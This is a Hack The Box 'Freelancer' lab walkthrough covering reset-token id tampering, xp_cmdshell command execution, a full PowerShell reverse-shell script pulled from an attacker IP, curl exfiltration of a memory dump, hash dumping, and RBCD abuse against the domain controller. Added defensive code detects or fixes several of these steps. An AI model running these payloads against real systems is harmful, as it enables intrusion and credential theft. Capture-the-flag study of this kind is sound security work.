Introduction

A domain penetration box from Hack The Box, officially rated Hard. Working through it felt fairly close to real engagement scenarios: it covers vertical privilege escalation, command execution through MSSQL, credential leakage from a memory dump (DMP) file, and RBCD abuse against the domain controller. A box well worth practising on.

Information gathering

Start with a port scan.

Quite a few ports are open; scan them again for service details.
┌──(kali㉿kali)-[~/box/Freelancer]
└─$ cat nmap/ports.nmap| grep open | awk -F'/' '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49676,49677,49680,54679,54683,
┌──(kali㉿kali)-[~/box/Freelancer]
└─$ sudo nmap -sT -A -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49676,49677,49680,54679,54683 10.10.11.5 -oA nmap/details
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-07 03:18 EDT
Nmap scan report for freelancer.htb (10.10.11.5)
Host is up (0.76s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Freelancer - Job Board & Hiring platform
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-07 12:18:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
54679/tcp open msrpc Microsoft Windows RPC
54683/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5h00m00s
| smb2-time:
| date: 2024-08-07T12:20:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 793.67 ms 10.10.16.1
2 797.50 ms freelancer.htb (10.10.11.5)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.58 seconds

Found the domain name freelancer.htb; add it to the hosts file.

Port 88 is open on the target, so enumerate users with kerbrute as usual.

Got a few usernames; save them for later.

Next, try to find users that do not require Kerberos pre-authentication.

That got nowhere, so look at port 80.

Directory scan:

┌──(kali㉿kali)-[~/box/Freelancer]
└─$ dirsearch -u freelancer.htb

Found its admin backend; brute-forcing it went nowhere, so set it aside for now.

A subdomain scan also turned up nothing.

Web exploitation

Back on the homepage there is one login option and two registration options; start by registering a freelancer account.

Poking around the freelancer account turned up nothing usable, so register an employer account next; at registration this one states outright that the account must be activated before use.

Logging in still prompts for activation, but while testing the forgot-password feature it turns out that resetting the password of an already-registered account bypasses activation.

Scanning the QR code at the QR-Code spot gives a URL.

In it, "MTAwMTE=" is base64; it decodes to a number, presumably an id.

Vertical privilege escalation

Admin usually has id 1, so base64-encode 1 and substitute it into the URL decoded from the QR code; this only returns an "invalid key" message.

Testing shows the admin's id is 2; substituting that into the URL lands on the admin home page.

With admin logged in this way, revisiting the admin backend also logs in successfully.
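The reset link recovered from the QR code carries nothing but base64(user_id), which is why swapping in the admin's id works. The following is an added example, not the site's code: the weak scheme beside a signed, expiring token that is bound to the user id it was issued for. SECRET, the ids and the timestamps are constructed values.

```python
"""Password-reset tokens: base64(id) as observed above, beside an HMAC-signed,
expiring token. Added example, not the application's code; SECRET, ids and
timestamps are constructed."""
import base64
import hashlib
import hmac
import time
from typing import Optional

SECRET = b"constructed-server-side-secret"  # hypothetical; load from config in real code
TOKEN_TTL = 900                              # seconds a reset link stays valid


def weak_token(user_id: int) -> str:
    """What the writeup observed: base64 of the id and nothing else."""
    return base64.b64encode(str(user_id).encode()).decode()


def weak_lookup(token: str) -> int:
    """Whatever id the token carries is trusted, so 'Mg==' (2) becomes the admin."""
    return int(base64.b64decode(token))


def _mac(uid: str, exp: str) -> str:
    return hmac.new(SECRET, f"{uid}.{exp}".encode(), hashlib.sha256).hexdigest()


def signed_token(user_id: int, now: Optional[int] = None) -> str:
    """Token = base64url('<id>.<expiry>.<hmac>'); only the server holds SECRET."""
    exp = int(time.time() if now is None else now) + TOKEN_TTL
    raw = f"{user_id}.{exp}.{_mac(str(user_id), str(exp))}"
    return base64.urlsafe_b64encode(raw.encode()).decode()


def signed_lookup(token: str, now: Optional[int] = None) -> Optional[int]:
    """Return the id the token was issued for, or None if tampered, malformed or expired."""
    try:
        uid, exp, mac = base64.urlsafe_b64decode(token).decode().split(".")
        uid_i, exp_i = int(uid), int(exp)
    except (ValueError, UnicodeDecodeError):
        return None                      # bad base64, wrong field count, non-numeric id/expiry
    if not hmac.compare_digest(mac, _mac(uid, exp)):
        return None                      # id or expiry was changed, or the mac is forged
    if exp_i < int(time.time() if now is None else now):
        return None                      # link is too old
    return uid_i


def swap_id(token: str, new_id: int) -> str:
    """Apply the writeup's id substitution to a signed token, to show the check rejects it."""
    _, exp, mac = base64.urlsafe_b64decode(token).decode().split(".")
    return base64.urlsafe_b64encode(f"{new_id}.{exp}.{mac}".encode()).decode()


if __name__ == "__main__":
    tok = signed_token(10011, now=1000)
    print("original token ->", signed_lookup(tok, now=1100))      # 10011
    print("id swapped to 2 ->", signed_lookup(swap_id(tok, 2), now=1100))  # None
```

The signed form fixes both problems at once: the id cannot be altered without invalidating the MAC, and the expiry bounds how long a leaked link stays usable. A production implementation would additionally make tokens single-use by recording them server-side.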

MSSQL exploitation

The admin panel has a SQL terminal; first check whether xp_cmdshell is enabled.

EXEC sp_configure 'xp_cmdshell';

xp_cmdshell is off; it can be enabled under sa privileges.

EXECUTE AS LOGIN = 'sa';

-- enable advanced options
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
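Every sp_configure change is written to the SQL Server ERRORLOG, so the sequence above leaves a trace a defender can alert on. The following detector is an added example, not part of the writeup; the log lines are constructed and follow the message format sp_configure emits when a setting changes.

```python
"""Flag xp_cmdshell (and similar) being switched on by scanning SQL Server ERRORLOG
lines. Added example, not from the writeup; SAMPLE_ERRORLOG is constructed."""
import re
from datetime import datetime
from typing import Dict, List

# Options whose enablement deserves an alert; 'show advanced options' is only the prelude
SENSITIVE_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}

CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Constructed ERRORLOG excerpt mirroring the enable sequence, plus benign noise and the later disable
SAMPLE_ERRORLOG = """\
2024-08-07 12:20:01.11 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-08-07 12:20:03.42 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-08-07 12:25:10.07 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-08-07 12:40:55.90 spid53      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""


def parse_config_changes(log_text: str) -> List[Dict]:
    """Return every configuration change found in the log, one dict per line."""
    changes = []
    for line in log_text.splitlines():
        m = CHANGE_RE.match(line)
        if not m:
            continue
        changes.append({
            "time": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            "spid": m["spid"],
            "option": m["option"],
            "old": int(m["old"]),
            "new": int(m["new"]),
        })
    return changes


def find_enablements(log_text: str) -> List[Dict]:
    """Changes that turn a sensitive option from off (0) to on (non-zero)."""
    return [c for c in parse_config_changes(log_text)
            if c["option"] in SENSITIVE_OPTIONS and c["old"] == 0 and c["new"] != 0]


if __name__ == "__main__":
    for hit in find_enablements(SAMPLE_ERRORLOG):
        print(f"{hit['time']} {hit['spid']}: '{hit['option']}' enabled")
```

The disable at the end of the sample is deliberately not flagged: the point is to catch the moment an operator or attacker turns the feature on, and to correlate the spid with the login that issued the change.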

Check again: xp_cmdshell is now enabled.

See whether commands actually run:

EXECUTE AS LOGIN = 'sa';
EXECUTE xp_cmdshell 'whoami';

Commands run, so the next step is a reverse shell. Several reverse-shell variants failed to execute; this ps1 found online worked.

EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell 'powershell -c iex(iwr -usebasicparsing http://10.10.16.23/shell.ps1)';
# shell.ps1
do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1

    # Connect to C2
    try{
        $TCPClient = New-Object Net.Sockets.TCPClient('10.10.16.23',1234)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client receive buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the initial empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)

    # Execute command and save output (including errors thrown)
    $Output = try {
        Invoke-Expression $Command 2>&1 | Out-String
    } catch {
        $_ | Out-String
    }

    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

Got a shell.

Post-exploitation

Once on the box, it is clear that many users have logged on to this machine; save those usernames for later.

Under sql_svc's folder C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU there is a database configuration file; reading it reveals two passwords. Copy them into the password list for later.

With a handful of usernames and passwords, spray them internally and see what sticks; one pair works: mikasaAckerman:IL0v3ErenY3ager

crackmapexec smb 10.10.11.5 -u user.txt -p pass.txt

With those credentials, upload RunasCs to move laterally.

powershell (new-object Net.WebClient).DownloadFile('http://10.10.16.23/RunasCs.exe','C:\Users\Public\RunasCs.exe')

Run it to pop a shell:

./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r 10.10.16.23:9999

user.txt is on this user's desktop.

Reading mail.txt on the desktop, the other file there, MEMORY.7z, should be the full memory dump he mentions sending.

Download MEMORY.7z to the attacking machine to take a look.

# target machine
cmd /c 'curl -F "file=@MEMORY.7z" http://10.10.16.23:3333/p'

# kali
./httpuploadexfil :3333 .

Opening the archive reveals a dmp file.

It can be parsed and mounted with https://github.com/ufrisk/MemProcFS:

sudo ./memprocfs -device MEMORY.DMP -mount /mnt

Browsing a few directories, registry/hive_files holds the machine's SAM, SYSTEM and SECURITY hives.

Copy them out and dump the hashes with secretsdump:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

That yields a password, PWN3D#l0rr@Armessa199, but no username; spray it against the usernames collected earlier.

crackmapexec smb 10.10.11.5 -u user.txt -p PWN3D#l0rr@Armessa199

That gives a valid pair, lorra199:PWN3D#l0rr@Armessa199; log in over WinRM directly.

evil-winrm -i 10.10.11.5 -u lorra199 -p "PWN3D#l0rr@Armessa199"

Attacking the DC (RBCD)

Export the domain data with bloodhound-python; sync the clock with the server before doing so.

ntpdate -u freelancer.htb

bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -ns 10.10.11.5

Opening the generated files in BloodHound shows that lorra199 is a member of the AD RECYCLE BIN group, and that group has GenericWrite over the DC computer object. That permits modifying the account's attributes, including setting or changing the list of services permitted for delegation, which enables resource-based constrained delegation (RBCD).

With a plan in place, start executing: first add a computer account.

impacket-addcomputer freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199' -dc-ip 10.10.11.5

Then use the RBCD tool to add the new machine to the DC's delegation list, which allows the delegating machine, under certain conditions, to impersonate arbitrary users against the target.

impacket-rbcd -delegate-from 'DESKTOP-Z5W2UXMM$' -delegate-to 'dc$' -dc-ip 10.10.11.5 -action write freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'
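What that write actually changes is the DC object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, a binary security descriptor whose DACL lists the SIDs permitted to delegate to the account. Auditing that attribute on high-value accounts is how a defender spots the change. The following is an added example, not impacket's code: it builds such a descriptor the way a write would, parses one back, and flags any SID not on an allowlist. All SIDs and account names are constructed.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity (a self-relative NT security
descriptor). Added example, not the tool's code; every SID below is constructed."""
import struct
from typing import Dict, List, Set

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF            # access mask for the ACE; parsing does not depend on it
BUILTIN_ADMINS = "S-1-5-32-544"      # owner/group in the descriptor


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-a-b-c-rid' -> binary SID (revision, count, 48-bit authority, sub-authorities)."""
    parts = sid.split("-")
    if parts[:2] != ["S", "1"]:
        raise ValueError("bad SID: " + sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int) -> str:
    """Decode the binary SID starting at buf[off]."""
    rev, count = struct.unpack_from("<BB", buf, off)
    if rev != 1:
        raise ValueError("unsupported SID revision")
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)


def build_rbcd_descriptor(allowed_sids: List[str]) -> bytes:
    """Self-relative SD: 20-byte header, owner SID, group SID, then a DACL with one
    ACCESS_ALLOWED ACE per SID that may act on behalf of other identities."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces  # ACL_REVISION = 2
    owner = sid_to_bytes(BUILTIN_ADMINS)
    owner_off = 20
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, group_off, 0, dacl_off)  # no SACL
    return header + owner + owner + dacl


def allowed_to_delegate(sd: bytes) -> List[str]:
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL; empty when the attribute is unset or the DACL is absent."""
    if not sd:
        return []
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd, off + 8))
        off += ace_size                  # skip the ACE whatever its type
    return sids


def audit_rbcd(entries: Dict[str, bytes], allowlist: Set[str]) -> Dict[str, List[str]]:
    """{account: [unexpected SIDs]} for accounts that let an unapproved SID delegate to them."""
    findings = {}
    for account, sd in entries.items():
        unexpected = [s for s in allowed_to_delegate(sd) if s not in allowlist]
        if unexpected:
            findings[account] = unexpected
    return findings


# Constructed scenario: a DC$ object whose descriptor names one approved host and one
# newly added computer account that nobody approved, next to a host with the attribute unset.
DOMAIN = "S-1-5-21-1000000001-1000000002-1000000003"     # hypothetical domain SID
APPROVED = {DOMAIN + "-1105"}                             # hypothetical approved delegating host
SAMPLE_ENTRIES = {
    "DC$": build_rbcd_descriptor([DOMAIN + "-1105", DOMAIN + "-5601"]),
    "WEB01$": b"",                                        # attribute not set
}

if __name__ == "__main__":
    for account, sids in audit_rbcd(SAMPLE_ENTRIES, APPROVED).items():
        print(f"{account}: unexpected delegation from {', '.join(sids)}")
```

In a real audit the bytes come from an LDAP read of the attribute on each tier-0 account, and the allowlist from change records; any SID that resolves to a freshly created computer account, as in the step above, is the signal. Restricting who can add computer accounts (ms-DS-MachineAccountQuota) and who holds write rights over the DC object closes the path itself.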

Use getST to obtain a service ticket for the CIFS service:

impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/DESKTOP-Z5W2UXMM$:'83fEpK1o8uyLpodcR7anH376NL7C2z5k'

Import the ticket, then dump the hashes with secretsdump:

export KRB5CCNAME=Administrator.ccache
impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm

With the hash in hand, log in with evil-winrm:

evil-winrm -i freelancer.htb -u administrator -H '0039318f1e8274633445bce32ad1a290'

Got root.